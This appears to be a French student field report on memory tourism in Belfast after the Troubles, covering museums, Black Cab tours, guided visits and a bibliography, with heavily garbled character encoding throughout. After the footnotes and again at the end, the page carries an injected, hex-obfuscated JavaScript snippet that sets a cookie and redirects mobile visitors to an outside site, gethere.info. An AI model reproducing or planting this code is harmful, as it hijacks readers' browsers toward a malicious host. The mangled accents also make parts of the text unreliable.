Ensuite, bien qua��une grande partie de la��Ulster Museum relative aux Troubles soit constituA�e da��informations objectives et de faits historiques irrA�futables prA�sentA�s de maniA?re unilatA�rale, nous avons dA�couvert grA?ce A� la��un de nos camarade une petite section portant sur des tA�moignages audio du conflit. Cette partie du musA�e, regrettablement peu mise en valeur, nous a permis de nous plonger dans le vA�cu des individus. La partie BBC Legacy de cette plateforme fut trA?s intA�ressante dans le cadre de notre travail, car la prA�sentation des rA�cits personnels y est faite da��une maniA?re telle qua��elle est accessible A� tout un chacun : en effet, il na��est pas nA�cessaire da��avoir certaines connaissances scientifiques ou historiques prA�alables pour A?tre touchA� par ces commentaires et la mA�moire du narrateur nous parvient mA?me si ce dernier ne se trouve pas en face de nous. Par exemple, parmi les rA�cits partisans figure la��histoire da��un homme loyaliste, dont la famille A�tait trA?s impliquA�e dans le conflit. Ce dernier conte les raisons de son attitude critique envers les actes de sa famille et nous explique qua��il a dA�cidA� de sa��en A�carter avec sa sA�ur.

Un autre tA�moignage que nous avons entendu est celui da��une femme catholique racontant son enfance perdue, sa mA?re ayant A�tA� assassinA�e durant les Troubles lorsqua��elle avait neuf ans. Da��autres rA�cits purement personnels qui ne mentionnent pas la position de la��individu dans le conflit sont proposA�s, comme celui da��une femme touchA�e par balle A� la jambe alors qua��elle A�tait enceinte de trois mois. Cette derniA?re nous fait part de ses prA�occupations et angoisses du moment en nous affirmant que mA?me si elle et son enfant ont survA�cu, ce traumatisme la hantera A� vie.

Ces tA�moignages ont eu pour effet de nous plonger directement dans la��atmosphA?re du conflit. MA?me si cette expA�rience na��A�tait pas interactive, nous sommes aujourda��hui porteuses de la mA�moire de ces personnes.

Enfin, une derniA?re expA�rience qui nous permet da��affirmer notre premiA?re hypothA?se est celle de la visite des quartiers de Shankill et Falls en Black Cab. Une citation issue du flyer de la compagnie TaxiTrax illustre bien la��idA�e de transmission de mA�moire par le biais da��expA�riences personnelles: A�A�All of our drivers are highly experienced with a wealth of personal knowledge, guaranteeing your trip to be something you will always remember. (a��) [A]s your driver shares a little personal anecdote, you can be sure that you will have seen the real Belfast (a��)A�A�. En effet, au vu de notre expA�rience dans ces taxis nous pouvons affirmer la vA�racitA� de cette citation : premiA?rement, cette visite nous a vA�ritablement permis de nous projeter dans la pA�riode des Troubles, car la mise en rA�cit y est trA?s valorisA�e. Tout au long de cette escapade en voiture, notre chauffeur nous faisait part des histoires qua��il avait vA�cu durant le conflit. Par exemple, lorsque nous lisions les noms des dA�funts mentionnA�s sur les mA�moriels, il nous avouait que certains da��entre eux faisaient partie de ses amis. Aussi, ayant A�tA� lui-mA?me prisonnier politique, cela rendait son discours da��autant plus poignant et nous avons vraiment A�tA� touchA�es par ce qua��il nous a confiA�. Lorsque nous lui avons demandA� pourquoi il avait voulu exercer cette profession, ce dernier nous a simplement rA�pondu : A�A�I want to put a face on the situation and humanize the warA�A�. Suite A� cela, il nous a affirmA� qua��il prA�fA�rait raconter lui-mA?me sa perception du conflit plutA?t qua��elle soit transmise par le biais da��un livre da��histoire, car les gens sont plus rA�ceptifs lorsqua��une personne parle elle-mA?me de son histoire. En effet, la mise en scA?ne de son vA�cu personnel nous a poussA� A� ressentir de la compassion et nous a conduit A� une meilleure comprA�hension de sa position. Cet effet a A�tA� renforcA� par le fait que la visite A�tait interactive : notre conducteur rA�pondait volontiers A� toutes nos questions, mA?me si ces derniA?res A�taient parfois intimes. En discutant avec lui, nous avons eu la��impression de participer A� la co-construction de la mA�moire des Troubles, car nous pouvons dire qua��A� prA�sent, nous avons acquis une infime partie de la sienne.

Au vu de ces expA�riences touristiques, nous pouvons affirmer que la��une des modalitA�s de la��offre touristique belfastoise qui contribue A� la perpA�tuation de la mA�moire du conflit est la mise en scA?ne de rA�cits personnels dans une perspective interactive. Bien que cette modalitA� ne soit pas de mise partout, notre visite guidA�e du Loyalist Museum, notre tour en Black Cab, et la visite de la��Ulster Museum ont pour point commun de valoriser la mise en rA�cit dans le but de plonger le visiteur dans la dure rA�alitA� qui a sA�vi A� Belfast entre 1969 et 1998.

3.1.2 La valorisation de circuits pA�dagogiques

a) Une transmission unilatA�rale da��informations

Notre deuxiA?me hypothA?se qui stipule la mise en place de circuits pA�dagogiques stimulant la co-construction de mA�moire se voit rA�futA�e A� plusieurs reprises. PremiA?rement, nous avons trouvA� la visite du City Hall trA?s peu pA�dagogique dans le sens oA? il sa��agissait da��un tourisme oA? la��interaction avec le visiteur A�tait quasi inexistante. Un guide nous a accueilli et nous a prA�sentA� le City Hall en nous donnant beaucoup da��informations sans attendre de rA�flexions trA?s poussA�es de notre part. En effet, la quantitA� de matiA?re transmise par ce dernier A�tait telle qua��il nous A�tait difficile de rebondir sur ces informations. Le seul moment interactif dA�celA� lors de cette visite fut le moment oA? nous nous sommes assises sur la chaise du maire. Toutefois, nous ne pouvons qualifier cet A�pisode de pA�dagogique, mais uniquement da��interactif, car il ne nous a pas permis de comprendre pour autant le fonctionnement du systA?me politique belfastois.

Nous avons ressenti le mA?me manque de pA�dagogie lors du Belfast City Sightseeing open top Bus. Sur leur flyer, le fait de visiter les murals les plus cA�lA?bres de Belfast et de parcourir de long en large le Peacewall A�tait prA�sentA� comme un point fort de la compagnie. Cependant, ceci na��a A�tA� en fait qua��une infime partie de ce que le tour propose, et les informations relatives A� la thA�matique des Troubles se sont retrouvA�es noyA�es dans une masse d’informations, notamment relatives A� la��histoire du Titanic. Si nous A�tions des touristes en recherche da��un survol de la ville, cette visite aurait A�tA� amplement suffisante. Or, en tant que chercheuses nous avons trouvA� cette visite trA?s superficielle, ce qui nous a empA?chA� da��en saisir le fil conducteur. Ainsi, nous avons eu la��impression da��A?tre de simples spectatrices du fait que nous na��avons pas eu la��opportunitA� de manifester notre comprA�hension et/ou incomprA�hension des informations qui nous A�taient donnA�es.

Puis, nous avons jugA� important de visiter le musA�e officiel de la ville afin da��avoir un avis neutre sur le conflit. Nous nous sommes donc rendues A� la��Ulster Museum oA? nous avons pu explorer la section dA�diA�e aux Troubles. Loin da��A?tre inintA�ressante, cette exposition parle da��elle-mA?me, ca��est pourquoi elle ne nA�cessite pas la prA�sence da��un guide. Il sa��agit da��un espace oA? sont disposA�s des murs avec du texte et des images qui retracent la��histoire du conflit. Une fois encore, nous avons eu affaire A� une transmission unilatA�rale da��informations, sans interaction entre le visiteur et la��acteur de la��offre touristique. Nous na��avons dA�celA� aucun moyen pour le touriste de participer A� cette co-construction de mA�moire, par le biais de rA�flexions qui conduiraient le prestataire A� modifier son offre par rapport aux attentes du public. En ce qui concerne la plateforme des tA�moignages mentionnA�e dans notre premiA?re hypothA?se, elle est A�galement composA�e da��une partie nommA�e CAIN Web Service qui comprend des sources scientifiques et des articles divers A� propos du conflit. Cependant, mA?me si cette partie participe en quelque sorte A� la��assimilation de la mA�moire par le touriste, nous avons trouvA� cette derniA?re trA?s acadA�mique et peu accessible A� tout un chacun. En effet, il sa��agit da��articles scientifiques qui nA�cessitent une certaine connaissance prA�alable pour assurer leur comprA�hension. Ceci nous laisse penser que cette rubrique est plutA?t dirigA�e vers des chercheurs en quA?te da��informations prA�cises. Ainsi, cela contribue A� discriminer les individus disposant de peu de capital culturel dans le processus de perpA�tuation de la mA�moire.

Enfin, la derniA?re expA�rience qui nous oblige contre toute attente A� rA�futer notre deuxiA?me hypothA?se est celle du Loyalist Museum. En ce qui concerne la premiA?re partie nous prA�sentant le musA�e en tant que tel, le guide nous a donnA� beaucoup da��informations de faA�on trA?s unilatA�rale sans nous laisser la possibilitA� de poser des questions pendant la��intervention. Notre participation a donc A�tA� trA?s limitA�e et nous sommes devenues, une fois de plus, spectatrices da��une performance identitaire. Nous avons A�galement eu le mA?me ressenti lors de la seconde partie de la visite. En effet, le guide nous a parlA� en grande partie des forces armA�es protestantes en louant leurs A�A�exploitsA�A� sans chercher A� avoir un rA�el A�change avec le visiteur. La prA�sentation du quartier de East Belfast a A�tA� faite de maniA?re trA?s partiale. Notre capacitA� A� poser des questions A�tait passablement limitA�e et nous avons eu la��impression que nos remarques A� la��encontre de leur point de vue na��A�taient pas les bienvenues, ce qui a rendu la��atmosphA?re assez particuliA?re.

Avec un peu de recul, nous gardons la��impression que ce manque de pA�dagogie ne nous a pas conduit A� une assimilation optimale de la mA�moire. Cependant, ces critiques ne tiennent qua��A� nous, et nos attentes dA�finies au prA�alable ont sans doute biaisA� nos impressions.

b) PA�dagogie et construction de mA�moire

Bien que les arguments allant A� la��encontre de notre deuxiA?me hypothA?se soient nombreux, nous avons tout de mA?me pu assister A� des visites qui nous permettent de la vA�rifier. Nous avons eu la��occasion de visiter le Centre GaA�lique CultA?rlann McAdam A� Fiaich oA? nous avons A�tA� informA�es A� propos de la culture gaA�lique. MalgrA� le fait que la thA�matique des Troubles na��ait pas A�tA� abordA�e, nous avons jugA� pertinent de mentionner cette visite dans le cadre de notre deuxiA?me hypothA?se, car elle montre cette modalitA� pA�dagogique du tourisme. En effet, le but de ce centre est la perpA�tuation de la culture gaA�lique. Pour ce faire, il nous a A�tA� distribuA� A� chacun un petit livret avec les expressions courantes traduites de la��anglais au gaA�lique. Il y a donc eu une rA�elle interaction entre le guide et nous-mA?mes ce qui a rendu la visite plus pA�dagogique, tout en nous immergeant bien dans la problA�matique en question.

Enfin, la visite qui contribue le plus A� la vA�rification de notre deuxiA?me hypothA?se est sans doute le tour en Black Cab. ArrivA�es vers notre taxi, le guide-conducteur sa��est prA�sentA� en nous demandant ce que nous voulions savoir sur Belfast.

Ca��est exactement A� ce genre da��attitude que nous nous attendions dans le cadre da��un tourisme pA�dagogique. En effet, notre guide sa��est assurA� de savoir ce qui nous intA�ressait afin de ne pas sa��attarder sur des A�lA�ments historiques na��ayant qua��une importance secondaire pour nous. Tout au long de notre rencontre, ce dernier a adaptA� son parcours en fonction de nos attentes et nos dA�sirs, crA�ant ainsi un vA�ritable A�change. Ce dernier sa��est A� plusieurs reprises inquiA�tA� de savoir si nous comprenions bien, en nous demandant toujours si nous avions des questions. Lorsqua��il sa��est aperA�u que nous prenions beaucoup de notes sur notre carnet de terrain, il sa��est empressA� de nous proposer de descendre du taxi afin de spatialiser son rA�cit. Bien que sa vision du conflit soit biaisA�e par son positionnement politico-religieux, cela na��A�tait pas gA?nant, car nous sentions bien qua��il A�tait ouvert A� la discussion et A� nos remarques. A plusieurs reprises, nous avons eu la��opportunitA� de lui poser des questions personnelles, il na��a jamais montrA� de mA�contentement A� notre A�gard et sa��est toujours arrangA� pour nous rA�pondre de la meilleure faA�on possible.

Pour conclure, on constate donc que la��offre touristique proposant des circuits pA�dagogiques est mince, mais pas inexistante. Nous sommes conscientes que nous na��avons pas expA�rimentA� toutes les formes de tourisme A� Belfast, mais nous avons tout de mA?me pu remarquer que les visites sont souvent mises en place de maniA?re unilatA�rale en ne cherchant pas da��A�change constructif avec le visiteur. La grande exception est donc celle de la visite avec les Black Cabs qui nous a permis da��avoir une interaction active et constructive avec le guide, A�galement acteur du conflit.

3.2 Tourisme et territorialisation mA�morielle

Afin de voir si les modalitA�s touristiques contribuant A� la perpA�tuation de la mA�moire tendent A� le faire en certains lieux spA�cifiques, nous allons analyser la dimension spatiale de nos expA�riences.

Pour ce qui est de notre City Tour en bus, la mA�moire du conflit tend A� A?tre spatialisA�e dans les quartiers de Falls et de Shankill, mais nous ne sommes passA�es que trA?s rapidement en ces lieux. Certes, la visite de ces quartiers contribue A� la diffusion da��une image A� la��A�tranger par le biais da��une territorialisation de la mA�moire, mais notre passage A�tait trop rapide pour affirmer qua��il existe un rA�el lien entre les souvenirs du conflit et certains lieux. Tel na��a pas A�tA� le cas avec la compagnie de taxi : notre chauffeur nous a conduit plus ou moins dans les mA?mes lieux que le bus, mais da��une toute autre maniA?re. Alors que nous ne faisions que passer devant les murals lors de notre City Tour, nous avions cette fois la��opportunitA� de descendre du taxi et ainsi de pratiquer la��espace. La��effet de territorialisation de la mA�moire dans certaines rues de Falls et Shankill A�tait bien plus fort, car nous avons eu la��opportunitA� de marcher dans les rues tout en A�coutant les expA�riences personnelles de notre chauffeur. Enfin, lors de la visite du quartier de East Belfast, notre guide avait tendance A� spatialiser la mA�moire du conflit en certains lieux emblA�matiques.

Ce dernier sa��est arrA?tA� plusieurs fois dans des mA�moriels protestants et sa��attardait devant certaines fresques emblA�matiques des groupes armA�s loyalistes, ce qui avait pour effet da��ancrer son rA�cit en certains lieux spA�cifiques. Cet effet de territorialisation de la mA�moire est efficace : A� la��avenir, nous associerons les souvenirs A�voquA�s par notre guide A� certains lieux prA�cis, que nous pouvons alors qualifier de lieux de mA�moire

Pour conclure, nous avons vu que la mA�moire tend gA�nA�ralement A� A?tre territorialisA�e dans certaines rues emblA�matiques des quartiers de Shankill et Falls. Aussi, nous constatons que certains lieux ou monuments, tels que les murals les plus cA�lA?bres, les grands mA�moriaux ou de maniA?re gA�nA�rale les quartiers emblA�matiques traversA�s par les peacelines, figurent de maniA?re rA�currente dans les propositions de circuits touristiques. Cela peut A?tre dA� A� leur caractA?re artistique da��une part et politique de la��autre. Cependant, bien que nous puissions dA�celer dans les deux derniA?res visites mentionnA�es un processus de territorialisation de la mA�moire, nous estimons que cela na��est pas suffisant pour vA�rifier cette troisiA?me hypothA?se.

4. Conclusion

Lorsque nous sommes arrivA�es A� Belfast, nous avons dA� faire face A� certaines difficultA�s. En effet, nous avions une idA�e passablement arrA?tA�e sur la forme qua��allait prendre notre travail de terrain. Par exemple, au dA�but de nos recherches, nous A�tions trA?s focalisA�es sur le contenu des discours tenus par les acteurs de la��offre touristique. Or, nous nous sommes vite aperA�ues que dans le cadre de notre travail, le contenu importait moins que la forme et la maniA?re de prA�senter les A�vA�nements passA�s dans le processus de co-construction mA�morielle. Peu A� peu, nous nous en sommes rendues compte et nous avons modifiA� notre maniA?re de rA�colter nos donnA�es afin que ces derniA?res nous apportent de rA�els A�lA�ments de rA�ponses. Nous avons donc cessA� de prendre note des informations factuelles qui nous A�taient transmises et nous nous sommes concentrA�es sur le comportement et la��attitude des acteurs de la��offre touristique.

En conclusion, notre sA�jour A� Belfast nous a effectivement permis de relever deux modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production de mA�moire. En effet, nous avons constatA� que certains acteurs mettent bien en place des circuits pA�dagogiques et valorisent les rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit. Bien que ces deux modalitA�s ne soient pas gA�nA�ralisables A� la��entiA?retA� de la��offre touristique belfastoise, nous estimons que nos donnA�es sont suffisantes pour vA�rifier nos deux hypothA?ses relatives A� la mise en scA?ne de rA�cits personnels et de circuits pA�dagogiques dans le cadre da��un tourisme mA�moriel.

Aussi, notre travail de terrain nous a permis de rA�pondre de maniA?re plus ou moins complA?te A� la premiA?re partie de notre question de recherche. Tel ne fut pas le cas pour notre troisiA?me hypothA?se relative A� la territorialisation de la mA�moire dans le cadre du tourisme belfastois. Comme mentionnA� ci-dessus, nous manquons da��informations afin da��affirmer qua��il existe un rA�el processus de territorialisation mA�morielle. Bien que nous soyons restA�es plus da��une semaine A� Belfast, nous na��avons pas eu le temps de rA�colter le matA�riel nA�cessaire afin de mener A� bien une analyse exhaustive de ce processus. Une agence touristique nous a proposA� un walking tour dont il aurait A�tA� intA�ressant de comparer le parcours avec ceux proposA�s par le City Tour et les Black Cabs. Malheureusement, nous nous sommes vues prises par le temps et nous avons dA� renoncer A� cette opportunitA�. Da��autres facteurs nous ont freinA�es dans la��analyse des processus de territorialisation mA�morielle, notamment notre manque da��expA�rience et de connaissances en la matiA?re. Aussi, la littA�rature relative A� ce sujet est passablement lacunaire, bien que certains auteurs aient thA�orisA� le concept de lieu de mA�moire, notamment A-C. Morand (2009), J-D. Urbain (2003), et A. Hertzog (2012). Ces A�lA�ments nous ont empA?chA� de maA�triser rA�ellement cette thA�matique, ce qui a entravA� nos recherches sur le terrain.

Pour aller plus loin, dans le cadre da��une recherche plus globale et reprA�sentative, il serait intA�ressant de multiplier les expA�riences touristiques afin da��avoir une rA�elle vision da��ensemble de ce qui est proposA� A� Belfast. En effet, le programme proposA� par nos enseignantes A�tant assez chargA�, nous avons dA�cidA� de concentrer nos recherches sur les visites prA�vues. Quitte A� diminuer la reprA�sentativitA� de nos rA�sultats ainsi que leur potentielle gA�nA�ralisation, nous avons prA�fA�rA� mener une analyse approfondie da��un nombre restreint de visites et de prospectus. Si nous nous A�tions basA�es sur un trop large panel da��expA�riences touristiques, cela nous aurait conduit A� une analyse plus superficielle du matA�riau collectA�.

Enfin, nous avons conscience que notre analyse a A�tA� passablement non-exhaustive A�tant donnA� le temps qui nous A�tait imparti. Il serait intA�ressant da��analyser en profondeur les logiques de spatialisation de la mA�moire des acteurs de la��offre touristique. En effet, cette thA�matique revA?t da��un grand intA�rA?t de par son caractA?re inA�dit, relativement inexplorA� et intrinsA?quement liA� A� la gA�ographie. Une fois la territorialisation de la mA�moire thA�orisA�e, une voie A� suivre afin da��aller encore plus loin pourrait A?tre da��analyser les buts de la crA�ation des lieux de mA�moire et leurs effets rA�els sur la population locale et A�trangA?re.

5. Bibliographie

CAIN Web Service (2006). Some Frequently Asked Questions a�� The Northern Ireland Conflict [En ligne]. http://cain.ulst.ac.uk/faq/faq2.htm#when (consultA� le 30 mars 2016).

BALLIF Florine (2014). A�A�A�Belfast en temps de paix : la guerre civile comme attraction touristiqueA�. TA�oros [En ligne], Vol. 34, NA�1-2, pp.2-23. https://teoros.revues.org/2761 (ConsultA� le 20 mars 2016).

BALLIF Florine (2012). A�A�Les peacelines de Belfast : le provisoire qui dureA�A�. HermA?s, La Revue [En ligne], Vol.2, NA�63, pp.116-119. https://www.cairn.info/load_pdf.php?ID_ARTICLE=HERM_063_0116 (ConsultA� le 1 fA�vrier 2016).

BROWN Kris, MACGINTY Roger (2003). A�A�Public attitudes toward partisan and neutral symbols in post-agreement Northern IrelandA�A�. IdentitiesA�: Global studies in culture and power [en ligne], Vol.10 NA�1, pp.83-108. http://www.tandfonline.com/doi/abs/10.1080/10702890304337 (ConsultA� le 16 fA�vrier 2016)

CRAHAY FrA�dA�ric (2014). A�A�Tourisme mA�morielA�A�. TA�moigner. Entre histoire et mA�moire. Revue pluridisciplinaire de la Fondation Auschwitz, NA�117, pp. 151-152.

EQUIPE M. I. T. (2000). A�A�La mise en tourisme des lieux: un outil de diagnosticA�A�.A� Mappemonde, Vol. 57, NA�1, pp. 1-6.

HERNANDEZ Julie (2008). A�A�Le tourisme macabre A� La Nouvelle-OrlA�ans aprA?s Katrina : rA�silience et mA�morialisation des espaces affectA�s par des catastrophes majeuresA�A�. Norois [en ligne], Vol.3, NA�208, pp. 61-73. http://norois.revues.org/2208 (ConsultA� le 16 fA�vrier 2016).

HERTZOG Anne (2012). A�A�Tourisme de mA�moire et imaginaire touristique des champs de batailleA�A�. Via, Revue internationale interdisciplinaire de tourisme [En ligne], NA�1, pp.1-16.http://viatourismreview.com/wp-content/uploads/2015/06/Article6.pdf (ConsultA� le 16 fA�vrier 2016).

LEGRAND Caroline (2002). A�A�Du tourisme gA�nA�alogique dans l’Irlande contemporaineA�A�. Revue de SynthA?se, Vol.123, NA�1, pp. 131-147.

LISLE Debbie (2006). A�A�Local symbols, global networks: rereading the murals of BelfastA�A�. Alternatives: Global, Local, Political, Vol. 31, NA�1, pp. 27-52.

MORAND Anne-CA�line (2009). MA�moires de Belfast: Les processus de la mise en tourisme de la mA�moire et leurs expressions spatiales. MA�moire professionnelA�: UniversitA� de Paris 1, PanthA�on Sorbonne, 190p. https://www.univ-paris1.fr/fileadmin/IREST/Memoires_Masters_2/MORAND_Anne-Celine.pdf (ConsultA� le 12 fA�vrier 2016).

NAEF Patrick James (2013). A�A�Tourisme de mA�moire, instrument de paix et/ou de rA�conciliationA�A�. Quand le tourisme questionne la mA�moire [En ligne], pp.70-80. https://archive-ouverte.unige.ch/unige:27745 (ConsultA� le 2 juin 2016).

PETITIER Paule (1989). A�A�Les Lieux de mA�moireA�A�. Romantisme [En ligne], Vol. 19, NA�63, pp. 103-110. www.persee.fr/doc/roman_0048-8593_1989_num_19_63_5570 (ConsultA� le 13 fA�vrier 2016).

URBAIN Jean-Didier (2003). A�A�Tourisme de mA�moire : un travail de deuil positifA�A�. Cahier Espaces, NA�80, pp.5-7.

Photographie A� la une: MA�moriel dans le quartier de East Belfast,A�par Valentina Ferreira GutiA�rrez, mars 2016.

[1] CAIN Web service [en ligne], http://cain.ulst.ac.uk/faq/faq2.htm#when consultA� le 20 mai 2012

[2] UFFA�: Real Ulster Freedom Fighters a�� UDAA�: Ulster Defense Association a�� UYMA�: Ulster Young Militance

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Documentation touristique et souvenirs

Au fil de notre sA�jour A� Belfast, nous avons rA�coltA� divers documents concernant l’offre touristique. Office du tourisme, boutiques, musA�es, A� chaque opportunitA� donnA�e, nous avons collectionnA� des documents, destinA�s aux touristes, ayant trait aux murals: brochures publicitaires, plans pour touristes, carte postale, etc.

A premiA?re vue, rA�colter souvenirs et documents touristiques traitant des murals de Belfast nous semblait A?tre un travail titanesque. Mais nous avons trA?s vite A�tA� forcA� de constater que peu de magasins ne vendent souvenirs et cartes postales en lien avec les murals. Il en va de mA?me pour les tours opA�rateurs, seule une poignA�e da��entre eux promeut les murals dans la publicitA� pour leur circuit.

Dans les liens ci dessous sont dA�taillA�s et analysA�s les documents rA�coltA�s sur place.

Flyers, brochures et plans

Cartes postales

Souvenirs

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 